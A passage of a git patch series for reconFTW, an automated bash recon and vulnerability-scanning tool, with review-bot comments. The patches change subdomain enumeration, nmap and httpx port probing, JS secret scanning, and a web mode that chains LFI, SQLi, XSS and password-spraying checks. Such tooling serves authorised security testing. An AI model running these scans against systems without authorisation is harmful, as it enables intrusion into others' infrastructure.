-r Recon - Full recon process (only recon without attacks)\n" + printf " -s Subdomains - Search subdomains, check tko and web probe\n" + printf " -p Passive - Performs only passive steps \n" + printf " -a All - Perform all checks and 
exploitations\n" + printf " -w Web - Just web checks from list provided${reset}\n" + printf " -v Verbose - Prints everything including errors, for debug purposes\n" + printf " -h Help - Show this help\n" + printf " \n" + printf " ${bblue}GENERAL OPTIONS${reset}\n" + printf " --deep Deep scan (Enable some slow options for deeper scan)\n" + printf " -o output/path Define output folder\n" + printf " \n" + printf " ${bblue}USAGE EXAMPLES${reset}\n" + printf " Recon:\n" + printf " ./reconftw.sh -d example.com -r\n" + printf " \n" + printf " Subdomain scanning with multiple targets:\n" + printf " ./reconftw.sh -l targets.txt -s\n" + printf " \n" + printf " Web scanning for subdomain list:\n" + printf " ./reconftw.sh -d example.com -l targets.txt -w\n" + printf " \n" + printf " Multidomain recon:\n" + printf " ./reconftw.sh -m company -l domainlist.txt -r\n" + printf " \n" + printf " Full recon with custom output and excluded subdomains list:\n" + printf " ./reconftw.sh -d example.com -x out.txt -a -o custom/path\n" +} + +############################################################################################################### +########################################### START SCRIPT ##################################################### +############################################################################################################### + +banner + +check_version + +if [ -z "$1" ] +then + help + tools_installed + exit +fi + +while getopts ":hd:-:l:m:x:i:varspxwo:" opt; do + general=$@ + if [[ $general == *"-v"* ]]; then + unset DEBUG_STD + unset DEBUG_ERROR + fi + if [[ $general == *"--deep"* ]]; then + DEEP=true + fi + case ${opt} in + + ## TARGETS + + m ) multi=$OPTARG + ;; + d ) domain=$OPTARG + ;; + l ) list=$OPTARG + ;; + x ) outOfScope_file=$OPTARG + isAsciiText $outOfScope_file + if [ "False" = "$IS_ASCII" ] + then + printf "\n\n${bred} Out of Scope file is not a text file${reset}\n\n" + exit + fi + ;; + i ) inScope_file=$OPTARG + isAsciiText 
$inScope_file + if [ "False" = "$IS_ASCII" ] + then + printf "\n\n${bred} In Scope file is not a text file${reset}\n\n" + exit + fi + ;; + + ## MODES + + r ) if [ ! -z "$multi" ] + then + multi_recon + exit + fi + if [ -n "$list" ] + then + for domain in $(cat $list); do + start + recon + end + done + else + start + recon + end + fi + exit + ;; + s ) if [ -n "$list" ] + then + for domain in $(cat $list); do + subs_menu + done + else + subs_menu + fi + exit + ;; + a ) if [ -n "$list" ] + then + for domain in $(cat $list); do + all + done + else + all + fi + exit + ;; + w ) start + if [ -n "$list" ] + then + if [[ "$list" = /* ]]; then + cp $list $dir/webs/webs.txt + else + cp $SCRIPTPATH/$list $dir/webs/webs.txt + fi + fi + subtakeover + s3buckets + waf_checks + nuclei_check + cms_scanner + fuzz + 4xxbypass + cors + params + urlchecks + url_gf + jschecks + wordlist_gen + open_redirect + ssrf_checks + crlf_checks + lfi + ssti + sqli + xss + spraying + brokenLinks + test_ssl + end + exit + ;; + p ) if [ -n "$list" ] + then + for domain in $(cat $list); do + passive + done + else + passive + fi + exit + ;; + o ) dir_output=$OPTARG + output + ;; + \? | h | : | - | * ) + help + ;; + esac +done +shift $((OPTIND -1)) From aa042760eb034588ed9cca2c220a2a7821b3a2fa Mon Sep 17 00:00:00 2001 From: six2dez Date: Thu, 22 Apr 2021 09:42:13 +0200 Subject: [PATCH 16/19] Removed parallelism and added more error control --- reconftw.sh | 36 ++++++++++++++++++++++-------------- reconftw_axiom.sh | 29 +++++++++++++++++++---------- 2 files changed, 41 insertions(+), 24 deletions(-) diff --git a/reconftw.sh b/reconftw.sh index 4fbfe7b6..1e73bfc6 100755 --- a/reconftw.sh +++ b/reconftw.sh 
@@ -320,27 +320,26 @@ function sub_passive(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then start_subfunc "Running : Passive Subdomain Enumeration" - eval subfinder -d $domain -o .tmp/subfinder_psub.txt $DEBUG_STD & - eval assetfinder --subs-only $domain $DEBUG_ERROR | anew -q .tmp/assetfinder_psub.txt & - eval amass enum -passive -d $domain -config $AMASS_CONFIG -o .tmp/amass_psub.txt $DEBUG_STD & - eval findomain --quiet -t $domain -u .tmp/findomain_psub.txt $DEBUG_STD & - eval crobat -s $domain $DEBUG_ERROR | anew -q .tmp/crobat_psub.txt & + eval subfinder -d $domain -o .tmp/subfinder_psub.txt $DEBUG_STD + eval assetfinder --subs-only $domain $DEBUG_ERROR | anew -q .tmp/assetfinder_psub.txt + eval amass enum -passive -d $domain -config $AMASS_CONFIG -o .tmp/amass_psub.txt $DEBUG_STD + eval findomain --quiet -t $domain -u .tmp/findomain_psub.txt $DEBUG_STD + eval crobat -s $domain $DEBUG_ERROR | anew -q .tmp/crobat_psub.txt if [ -s "${GITHUB_TOKENS}" ];then if [ "$DEEP" = true ] ; then - eval github-subdomains -d $domain -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD & + eval github-subdomains -d $domain -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD else - eval github-subdomains -d $domain -k -q -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD & + eval github-subdomains -d $domain -k -q -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD fi fi - eval curl -s "https://jldc.me/anubis/subdomains/${domain}" $DEBUG_ERROR | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d' | anew -q .tmp/jldc_psub.txt & - timeout 10m waybackurls $domain | unfurl --unique domains | anew -q .tmp/waybackurls_psub.txt & - timeout 10m gauplus -t $GAUPLUS_THREADS -random-agent -subs $domain | unfurl --unique domains | anew -q .tmp/gau_psub.txt & + eval curl -s "https://jldc.me/anubis/subdomains/${domain}" $DEBUG_ERROR | grep -Po 
"((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d' | anew -q .tmp/jldc_psub.txt + timeout 10m waybackurls $domain | unfurl --unique domains | anew -q .tmp/waybackurls_psub.txt + timeout 10m gauplus -t $GAUPLUS_THREADS -random-agent -subs $domain | unfurl --unique domains | anew -q .tmp/gau_psub.txt if echo $domain | grep -q ".mil$"; then mildew mv mildew.out .tmp/mildew.out cat .tmp/mildew.out | grep ".$domain$" | anew -q .tmp/mil_psub.txt fi - wait $(jobs -rp) NUMOFLINES=$(eval cat .tmp/*_psub.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/passive_subs.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (passive)" ${FUNCNAME[0]} else @@ -571,7 +570,10 @@ function zonetransfer(){ then start_func "Zone transfer check" eval python3 $tools/dnsrecon/dnsrecon.py -d $domain -a -j subdomains/zonetransfer.json $DEBUG_STD - if grep -q "\"zone_transfer\"\: \"success\"" subdomains/zonetransfer.json ; then notification "Zone transfer found on ${domain}!" info; fi + if [ -s "subdomains/zonetransfer.json" ] + then + if grep -q "\"zone_transfer\"\: \"success\"" subdomains/zonetransfer.json ; then notification "Zone transfer found on ${domain}!" info; fi + fi end_func "Results are saved in subdomains/zonetransfer.txt" ${FUNCNAME[0]} else if [ "$ZONETRANSFER" = false ]; then 
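Review bot: With the trailing `&` and the `wait $(jobs -rp)` gone, the enumerators in this hunk run back-to-back, yet the `eval curl -s "https://jldc.me/anubis/subdomains/${domain}"` line still carries no timeout, so a stalled request now delays every enumerator after it instead of only the final wait; `timeout 10m` already bounds the waybackurls and gauplus lines, so the curl line could be bounded the same way, e.g. `eval curl -s -m 60 "https://jldc.me/anubis/subdomains/${domain}" $DEBUG_ERROR | grep -Po ...`. The subfinder, amass and findomain invocations are likewise unbounded, and a one-line comment stating why serial execution was preferred (presumably the error control named in the commit title) would help the next reader who is tempted to re-add the `&`. sub_passive's body continues outside the hunk.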
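Review bot: The new `[ -s "subdomains/zonetransfer.json" ]` wrapper guards a single `grep -q`, so the two nested `if`s can be one condition: `if [ -s "subdomains/zonetransfer.json" ] && grep -q "\"zone_transfer\": \"success\"" subdomains/zonetransfer.json; then notification "Zone transfer found on ${domain}!" info; fi`. While touching the line, the `\:` inside the double-quoted pattern reaches grep as a backslash-colon escape that basic regex does not define, so newer GNU grep may warn about it; a plain `:` is what is meant. The unchanged `end_func` message on the next line still names `subdomains/zonetransfer.txt` although the file written is `subdomains/zonetransfer.json`. The same nested `if` is added to reconftw_axiom.sh's zonetransfer later in this patch.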
@@ -988,14 +990,20 @@ function jschecks(){
 printf "${yellow} Running : Resolving JS Urls 2/5${reset}\n"
 cat js/jsfile_links.txt | httpx -follow-redirects -random-agent -silent -timeout 15 -threads $HTTPX_THREADS -status-code -retries 2 -no-color | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt
 printf "${yellow} Running : Gathering endpoints 3/5${reset}\n"
- interlace -tL js/js_livelinks.txt -threads 10 -c "python3 $tools/LinkFinder/linkfinder.py -d -i _target_ -o cli >> .tmp/js_endpoints.txt" &>/dev/null
+ if [ -s "js/js_livelinks.txt" ]
+ then
+ interlace -tL js/js_livelinks.txt -threads 10 -c "python3 $tools/LinkFinder/linkfinder.py -d -i _target_ -o cli >> .tmp/js_endpoints.txt" &>/dev/null
+ fi
 if [ -s ".tmp/js_endpoints.txt" ]
 then
 eval sed -i '/^\//!d' .tmp/js_endpoints.txt $DEBUG_STD
 cat .tmp/js_endpoints.txt | anew -q js/js_endpoints.txt.txt
 fi
 printf "${yellow} Running : Gathering secrets 4/5${reset}\n"
- cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposures/ -r $resolvers_trusted -o js/js_secrets.txt $DEBUG_STD
+ if [ -s "js/js_livelinks.txt" ]
+ then
+ cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposures/ -r $resolvers_trusted -o js/js_secrets.txt $DEBUG_STD
+ fi
 printf "${yellow} Running : Building wordlist 5/5${reset}\n"
 if [ -s "js/js_livelinks.txt" ]
 then
diff --git a/reconftw_axiom.sh b/reconftw_axiom.sh
index 920dfc70..ad2fd2ad 100755
--- a/reconftw_axiom.sh
+++ b/reconftw_axiom.sh
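Review bot: The three `[ -s "js/js_livelinks.txt" ]` guards (the two added here plus the existing one before step 5/5) test the same file one after another, so a single `if` around steps 3–5, or an early `return` when the file is empty after step 2/5, expresses the intent more clearly than repeating the check per step. On the unchanged step 2/5 line, `grep "[200]"` is a bracket expression matching any single `2` or `0`, so it keeps every URL that contains either digit (a `[404]` line qualifies) rather than only 200 responses; `grep -F "[200]"` matches the literal status. `anew -q js/js_endpoints.txt.txt` in the context lines looks like a doubled extension. The same guards and the same `grep "[200]"` appear in reconftw_axiom.sh's jschecks later in this patch; jschecks continues outside both hunks.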
@@ -320,13 +320,13 @@ function sub_passive(){
 if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]
 then
 start_subfunc "Running : Passive Subdomain Enumeration"
- echo "/home/op/go/bin/subfinder -d ${domain}" > .tmp/sub_passive_commands.txt
- echo "/home/op/go/bin/assetfinder --subs-only ${domain}" >> .tmp/sub_passive_commands.txt
- echo "amass enum -passive -d ${domain}" >> .tmp/sub_passive_commands.txt
- echo "/usr/bin/findomain --quiet -t ${domain}" >> .tmp/sub_passive_commands.txt
- echo "timeout 10m /home/op/go/bin/waybackurls ${domain} | /home/op/go/bin/unfurl --unique domains" >> .tmp/sub_passive_commands.txt
- echo "timeout 10m /home/op/go/bin/gau ${domain} | /home/op/go/bin/unfurl --unique domains" >> .tmp/sub_passive_commands.txt
- eval axiom-scan .tmp/sub_passive_commands.txt -m exec -o .tmp/axiom_psub.txt $DEBUG_STD
+
+ eval axiom-scan $list -m subfinder -o .tmp/subfinder_psub.txt $DEBUG_STD
+ eval axiom-scan $list -m assetfinder -o .tmp/assetfinder_psub.txt $DEBUG_STD
+ eval axiom-scan $list -m amass -o .tmp/amass_psub.txt $DEBUG_STD
+ eval axiom-scan $list -m findomain -o .tmp/findomain_psub.txt $DEBUG_STD
+ eval axiom-scan $list -m waybackurls -o .tmp/waybackurls_psub_tmp.txt $DEBUG_STD && eval cat .tmp/waybackurls_psub_tmp.txt $DEBUG_ERROR | unfurl --unique domains | anew -q .tmp/waybackurls_psub.txt
+ eval axiom-scan $list -m gau -o .tmp/gau_psub_tmp.txt $DEBUG_STD && eval cat .tmp/gau_psub_tmp.txt $DEBUG_ERROR | unfurl --unique domains | anew -q .tmp/gau_psub.txt
 eval crobat -s $domain $DEBUG_ERROR | anew -q .tmp/crobat_psub.txt
 if [ -s "${GITHUB_TOKENS}" ];then
 if [ "$DEEP" = true ] ; then
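Review bot: The new `axiom-scan` lines take their targets from `$list`, while the rest of the function (the crobat line kept in context and the removed `-d ${domain}` commands) works on `$domain`; if `$list` is empty or unset on the single-domain path, each scan is launched without an input file and its output simply never appears in `.tmp/*_psub.txt`, with nothing reported. A guard before the first scan, `[ -s "$list" ] || notification "sub_passive: target list $list is empty" error`, or a comment naming where `$list` is populated for the single-domain case, would make the dependency explicit. The `eval axiom-scan ... && eval cat ...` chaining on the last two lines also means a failed scan silently leaves `.tmp/waybackurls_psub.txt` and `.tmp/gau_psub.txt` untouched, which fits the "error control" intent but deserves a one-line comment. sub_passive continues outside the hunk.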
@@ -572,7 +572,10 @@ function zonetransfer(){
 then
 start_func "Zone transfer check"
 eval python3 $tools/dnsrecon/dnsrecon.py -d $domain -a -j subdomains/zonetransfer.json $DEBUG_STD
- if grep -q "\"zone_transfer\"\: \"success\"" subdomains/zonetransfer.json ; then notification "Zone transfer found on ${domain}!" info; fi
+ if [ -s "subdomains/zonetransfer.json" ]
+ then
+ if grep -q "\"zone_transfer\"\: \"success\"" subdomains/zonetransfer.json ; then notification "Zone transfer found on ${domain}!" info; fi
+ fi
 end_func "Results are saved in subdomains/zonetransfer.txt" ${FUNCNAME[0]}
 else
 if [ "$ZONETRANSFER" = false ]; then
@@ -969,14 +972,20 @@ function jschecks(){ printf "${yellow} Running : Resolving JS Urls 2/5${reset}\n" eval axiom-scan js/jsfile_links.txt -m httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color -o .tmp/js_livelinks.txt $DEBUG_STD && cat .tmp/js_livelinks.txt | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt printf "${yellow} Running : Gathering endpoints 3/5${reset}\n" - interlace -tL js/js_livelinks.txt -threads 10 -c "python3 $tools/LinkFinder/linkfinder.py -d -i _target_ -o cli >> .tmp/js_endpoints.txt" &>/dev/null + if [ -s "js/js_livelinks.txt" ] + then + interlace -tL js/js_livelinks.txt -threads 10 -c "python3 $tools/LinkFinder/linkfinder.py -d -i _target_ -o cli >> .tmp/js_endpoints.txt" &>/dev/null + fi if [ -s ".tmp/js_endpoints.txt" ] then eval sed -i '/^\//!d' .tmp/js_endpoints.txt $DEBUG_STD cat .tmp/js_endpoints.txt | anew -q js/js_endpoints.txt.txt fi printf "${yellow} Running : Gathering secrets 4/5${reset}\n" - eval axiom-scan js/js_livelinks.txt -m nuclei -wL /home/op/recon/nuclei/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_js/js_secrets.txt $DEBUG_STD + if [ -s "js/js_livelinks.txt" ] + then + eval axiom-scan js/js_livelinks.txt -m nuclei -wL /home/op/recon/nuclei/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_js/js_secrets.txt $DEBUG_STD + fi printf "${yellow} Running : Building wordlist 5/5${reset}\n" if [ -s "js/js_livelinks.txt" ] then From 2464acf1f2566e113c4b351084102aa6024ce0c3 Mon Sep 17 00:00:00 2001 From: six2dez Date: Thu, 22 Apr 2021 17:57:25 +0200 Subject: [PATCH 17/19] Small fix --- install.sh | 1 + reconftw_axiom.sh | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/install.sh b/install.sh index e2af73ba..83889bc7 100755 --- a/install.sh +++ b/install.sh 
@@ -234,6 +234,7 @@ eval $SUDO chmod 755 /usr/local/bin/findomain eval $SUDO chmod 755 /usr/local/bin/gowitness eval $SUDO chmod 755 /usr/local/bin/DNScewl eval subfinder $DEBUG_STD +eval subfinder $DEBUG_STD printf "${bblue}\n Running: Downloading required files ${reset}\n\n" ## Downloads diff --git a/reconftw_axiom.sh b/reconftw_axiom.sh index ad2fd2ad..e175c00b 100755 --- a/reconftw_axiom.sh +++ b/reconftw_axiom.sh @@ -323,7 +323,7 @@ function sub_passive(){ eval axiom-scan $list -m subfinder -o .tmp/subfinder_psub.txt $DEBUG_STD eval axiom-scan $list -m assetfinder -o .tmp/assetfinder_psub.txt $DEBUG_STD - eval axiom-scan $list -m amass -o .tmp/amass_psub.txt $DEBUG_STD + eval axiom-scan $list -m amass -passive -o .tmp/amass_psub.txt $DEBUG_STD eval axiom-scan $list -m findomain -o .tmp/findomain_psub.txt $DEBUG_STD eval axiom-scan $list -m waybackurls -o .tmp/waybackurls_psub_tmp.txt $DEBUG_STD && eval cat .tmp/waybackurls_psub_tmp.txt $DEBUG_ERROR | unfurl --unique domains | anew -q .tmp/waybackurls_psub.txt eval axiom-scan $list -m gau -o .tmp/gau_psub_tmp.txt $DEBUG_STD && eval cat .tmp/gau_psub_tmp.txt $DEBUG_ERROR | unfurl --unique domains | anew -q .tmp/gau_psub.txt From 346add04ff27293c2964cd882ae51eb5334232df Mon Sep 17 00:00:00 2001 From: six2dez Date: Fri, 23 Apr 2021 10:11:25 +0200 Subject: [PATCH 18/19] Improved httpx uncommon ports and subs mode and fixes --- reconftw.cfg | 1 + reconftw.sh | 24 ++++++++++-------------- reconftw_axiom.sh | 43 +++++++++++++++++++++++++++++-------------- 3 files changed, 40 insertions(+), 28 deletions(-) diff --git a/reconftw.cfg b/reconftw.cfg index c185541f..8ca1de08 100644 --- a/reconftw.cfg +++ b/reconftw.cfg 
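Review bot: The added `eval subfinder $DEBUG_STD` is byte-identical to the context line directly above it, so install.sh now runs subfinder twice in a row. If the repeat is deliberate (for instance the first invocation only writes the tool's default configuration and the second confirms it starts cleanly), say so on the line, e.g. `# run twice on purpose: first invocation only creates subfinder's default config`; otherwise the duplicate should be dropped.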
@@ -67,6 +67,7 @@ S3BUCKETS=true WEBPROBESIMPLE=true WEBPROBEFULL=true WEBSCREENSHOT=true +UNCOMMON_PORTS_WEB="81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672" # Host FAVICON=true diff --git a/reconftw.sh b/reconftw.sh index 1e73bfc6..9ec58e93 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -496,7 +496,7 @@ function sub_permut(){ if [ -f ".tmp/permute_subs.txt" ] then deleteOutScoped $outOfScope_file .tmp/permute_subs.txt - NUMOFLINES=$(eval cat .tmp/permute_subs.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l) + NUMOFLINES=$(eval cat .tmp/permute_subs.txt $DEBUG_ERROR | grep ".$domain$" | anew subdomains/subdomains.txt | wc -l) else NUMOFLINES=0 fi @@ -618,18 +618,14 @@ function webprobe_simple(){ else cat subdomains/subdomains.txt | httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt fi - deleteOutScoped $outOfScope_file .tmp/probed_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_tmp.txt $DEBUG_ERROR | anew webs/webs.txt | wc -l) - end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]} - if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/webs.txt| wc -l) -le 1500 ]] then notification "Sending websites to proxy" info eval ffuf -mc all -w webs/webs.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD fi - else if [ "$WEBPROBESIMPLE" = false ]; then printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" 
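Review bot: `UNCOMMON_PORTS_WEB` is introduced without any comment, and because this value is handed straight to `nmap -p` in webprobe_full later in the patch, the accepted format is not obvious from the name; a line above it such as `# Ports (nmap -p syntax) pre-scanned by webprobe_full before httpx probing` tells the reader how to edit it safely. Moving the list out of the script into the config file is the right direction; documenting the format completes it.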
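Review bot: The leading `.` added to `grep ".$domain$"` is a regex wildcard rather than a literal dot, so names that merely end in the domain string (`badexample.com` for `example.com`) still pass, which is presumably what the change set out to exclude; `grep "\.$domain$"` anchors on a literal dot (the dots inside `$domain` remain wildcards, so a fully literal match needs them escaped too). The identical filter is touched again in reconftw_axiom.sh's sub_permut hunk of this patch.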
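Review bot: Removing `deleteOutScoped $outOfScope_file .tmp/probed_tmp.txt` means hosts listed in the out-of-scope file are no longer stripped from the probed list before it is merged into `webs/webs.txt` and, in the proxy block kept in context, replayed to `$proxy_url`; if `subdomains/subdomains.txt` is already scope-filtered upstream the call was redundant, otherwise this hunk silently weakens scope enforcement for everything downstream of webs.txt. Note that reconftw_axiom.sh's webprobe_simple, patched later in this series, keeps the call, so the two scripts now diverge; a one-line comment stating why the filter is unnecessary here would settle it. webprobe_simple continues outside the hunk.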
@@ -643,7 +639,8 @@ function webprobe_full(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBEFULL" = true ] then start_func "Http probing non standard ports" - cat subdomains/subdomains.txt | httpx -ports 81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672 -follow-host-redirects -random-agent -status-code -threads $HTTPX_UNCOMMONPORTS_THREADS -timeout 10 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain" | anew -q .tmp/probed_uncommon_ports_tmp.txt + eval nmap -p $UNCOMMON_PORTS_WEB --max-retries 2 -Pn -iL subdomains/subdomains.txt -oG .tmp/nmap_uncommonweb.txt $DEBUG_STD && uncommon_ports_checked=$(cat .tmp/nmap_uncommonweb.txt | egrep -v "^#|Status: Up" | cut -d' ' -f4- | sed -n -e 's/Ignored.*//p' | tr ',' '\n' | sed -e 's/^[ \t]*//' | sort -u | cut -d '/' -f1 | sed -e 'H;${x;s/\n/,/g;s/^,//;p;};d') + cat subdomains/subdomains.txt | httpx -ports $uncommon_ports_checked -follow-host-redirects -random-agent -status-code -threads $HTTPX_UNCOMMONPORTS_THREADS -timeout 10 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain" | anew -q .tmp/probed_uncommon_ports_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_uncommon_ports_tmp.txt $DEBUG_ERROR | anew webs/webs_uncommon_ports.txt | wc -l) notification "Uncommon web ports: ${NUMOFLINES} new websites" good eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR 
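Review bot: `uncommon_ports_checked` is assigned only when the nmap pre-scan succeeds (it sits on the right of `&&`) and is empty when nmap reports no open ports, yet the next line runs `httpx -ports $uncommon_ports_checked ...` unconditionally; with the variable unset httpx receives `-follow-host-redirects` as its port list, and if webprobe_full is called once per domain in a loop, as multi_recon on this page does, a stale value from the previous domain can leak in because nothing resets it. Initialise it with `uncommon_ports_checked=""` before the nmap line and wrap the httpx pipeline in `if [ -n "$uncommon_ports_checked" ]; then … fi`. The long egrep/cut/sed pipeline that extracts the open ports from the grepable output also deserves a one-line comment naming the `-oG` fields it relies on. The same construct is introduced in reconftw_axiom.sh's webprobe_full hunk of this patch; both functions continue outside their hunks.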
@@ -666,8 +663,8 @@ function screenshot(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBSCREENSHOT" = true ] then start_func "Web Screenshots" - eval gowitness file -f webs/webs.txt --disable-logging $DEBUG_ERROR - eval gowitness file -f webs/webs_uncommon_ports.txt --disable-logging $DEBUG_ERROR + eval cat webs/webs.txt webs/webs_uncommon_ports.txt $DEBUG_ERROR | anew -q .tmp/webs_screenshots.txt + eval gowitness file -f .tmp/webs_screenshots.txt --disable-logging $DEBUG_ERROR end_func "Results are saved in screenshots folder" ${FUNCNAME[0]} else if [ "$WEBSCREENSHOT" = false ]; then @@ -715,11 +712,8 @@ function portscan(){ echo "$sub $(dig +short a $sub | tail -n1)" | anew -q .tmp/subs_ips.txt done awk '{ print $2 " " $1}' .tmp/subs_ips.txt | sort -k2 -n | anew -q hosts/subs_ips_vhosts.txt - eval cat hosts/subs_ips_vhosts.txt $DEBUG_ERROR | cut -d ' ' -f1 | egrep -iv "^(127|10|169|172|192)\." | anew -q hosts/ips.txt - eval cat hosts/ips.txt $DEBUG_ERROR | cf-check | egrep -iv "^(127|10|169|172|192)\." | anew -q .tmp/ips_nowaf.txt - printf "${bblue}\n Resolved IP addresses (No WAF) ${reset}\n\n"; eval cat .tmp/ips_nowaf.txt $DEBUG_ERROR | sort @@ -733,7 +727,7 @@ function portscan(){ if [ "$PORTSCAN_ACTIVE" = true ] then - eval nmap --top-ports 1000 -sV -n --max-retries 2 -iL .tmp/ips_nowaf.txt -oN hosts/portscan_active.txt -oG .tmp/nmap_grep.gnmap $DEBUG_STD + eval nmap --top-ports 1000 -sV -n --max-retries 2 -Pn -iL .tmp/ips_nowaf.txt -oN hosts/portscan_active.txt -oG .tmp/nmap_grep.gnmap $DEBUG_STD fi end_func "Results are saved in hosts/portscan_[passive|active].txt" ${FUNCNAME[0]} 
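Review bot: Adding `-Pn` to the active nmap line turns off host discovery, so every address in `.tmp/ips_nowaf.txt` is port-scanned even when it never answers, which lengthens the scan and reports closed or filtered ports for dead hosts; if the intent is to reach hosts that drop ICMP, a comment on the line, `# -Pn: treat every host as up, ICMP is commonly filtered`, records the trade-off. The same flag is added to the uncommon-port pre-scan in webprobe_full of this patch. portscan's body continues outside the hunk.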
@@ -1059,7 +1053,7 @@ function brokenLinks(){ fi fi sed -i '/^.\{2048\}./d' .tmp/gospider.txt - cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | sort -u | httpx -follow-redirects -random-agent -status-code -timeout 15 -silent -retries 2 -no-color | grep "\[4" | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt + cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | sort -u | httpx -follow-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | grep "\[4" | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt NUMOFLINES=$(eval cat .tmp/brokenLinks_total.txt $DEBUG_ERROR | anew webs/brokenLinks.txt | wc -l) notification "${NUMOFLINES} new broken links found" info end_func "Results are saved in webs/brokenLinks.txt" ${FUNCNAME[0]} @@ -1460,7 +1454,7 @@ function start(){ if [ -z "$domain" ] then - printf "\n\n${bred} No domain or list provided ${reset}\n\n" + notification "\n\n${bred} No domain or list provided ${reset}\n\n" error exit fi @@ -1680,6 +1674,8 @@ function multi_recon(){ function subs_menu(){ start subdomains_full + webprobe_full + screenshot subtakeover zonetransfer s3buckets diff --git a/reconftw_axiom.sh b/reconftw_axiom.sh index e175c00b..9448e5a2 100755 --- a/reconftw_axiom.sh +++ b/reconftw_axiom.sh 
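Review bot: The "No domain or list provided" path still ends in a bare `exit`, which returns the status of the preceding `notification` call (normally 0), so a wrapper or cron job cannot tell this failure from a successful run; `exit 1` on that line is enough. Also, if `notification` wraps its first argument in colour codes and newlines itself, as the helper of that name elsewhere in this series does, the `\n\n${bred} ... ${reset}\n\n` kept in the message gets decorated twice and could shrink to `notification "No domain or list provided" error`. start continues outside the hunk.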
@@ -357,7 +357,7 @@ function sub_crt(){ eval axiom-scan .tmp/sub_ctrf_commands.txt -m exec -o .tmp/crtsh_subs_tmp.txt $DEBUG_STD eval curl "https://tls.bufferover.run/dns?q=.${domain}" $DEBUG_ERROR | eval jq -r .Results[] $DEBUG_ERROR | cut -d ',' -f3 | grep -F ".$domain" | anew -q .tmp/crtsh_subs.txt eval curl "https://dns.bufferover.run/dns?q=.${domain}" $DEBUG_ERROR | eval jq -r '.FDNS_A'[],'.RDNS'[] $DEBUG_ERROR | cut -d ',' -f2 | grep -F ".$domain" | anew -q .tmp/crtsh_subs_tmp.txt - NUMOFLINES=$(eval cat .tmp/crtsh_subs_tmp.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/crtsh_subs.txt | wc -l) + NUMOFLINES=$(eval cat .tmp/crtsh_subs_tmp.txt $DEBUG_ERROR | anew .tmp/crtsh_subs.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (cert transparency)" ${FUNCNAME[0]} else if [ "$SUBCRT" = false ]; then @@ -499,7 +499,7 @@ function sub_permut(){ if [ -f ".tmp/permute_subs.txt" ] then deleteOutScoped $outOfScope_file .tmp/permute_subs.txt - NUMOFLINES=$(eval cat .tmp/permute_subs.txt $DEBUG_ERROR | grep ".$domain$" |anew subdomains/subdomains.txt | wc -l) + NUMOFLINES=$(eval cat .tmp/permute_subs.txt $DEBUG_ERROR | grep ".$domain$" | anew subdomains/subdomains.txt | wc -l) else NUMOFLINES=0 fi 